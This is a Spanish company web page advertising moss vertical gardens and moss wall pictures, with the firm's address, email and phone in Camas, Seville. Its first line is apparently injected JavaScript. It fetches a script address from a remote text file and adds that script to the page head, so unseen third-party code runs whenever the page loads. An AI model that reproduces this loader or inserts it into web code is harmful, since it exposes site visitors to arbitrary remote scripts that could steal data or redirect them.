;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
Un jardín vertical de musgo combina armónicamente arquitectura, paisajismo, ecología y salud, destacando por su estética y por su sostenibilidad medioambiental.
Este tipo de jardín vertical implica la instalación vertical de mantas de musgo y se caracteriza por crear espacios muy acogedores.
Las mantas de musgo permiten cubrir diferentes tipos de superficies y logran simular un atractivo jardín vertical en el interior de cualquier estancia. Además, no es necesario ni regarlas ni la luz del sol.
Las bases pueden ser de materiales diversos como, por ejemplo, piedra, resina, cerámica o cortezas.
Los cuadros de musgo son una de las muchas posibilidades de jardines verticales de musgo. Permiten ser la personalización, ofreciendo una gran variedad de colores de musgo y también diferentes tipo de enmarcaciones, y ofrecen múltiples posibilidades creativas a nivel decorativo.
Al poder adaptarse a casi cualquier forma permiten confeccionar letras y logos convirtiéndolos en un interesante recurso decorativo para empresas que deseen impactar con su imagen.
También son muy originales para decorar, por ejemplo, el salón de una vivienda particular, stands en exposiciones, bares, restaurantes y locales comerciales.
Dirección:
C/ Juan Agustín Palomar nº2
41900 Camas (Sevilla)
Email:
info@musgojardinesverticales.com
Teléfono:
674 66 21 98
2017 MUSGO | Aviso Legal | Política de Privacidad | Sitio web diseñado por BeYuri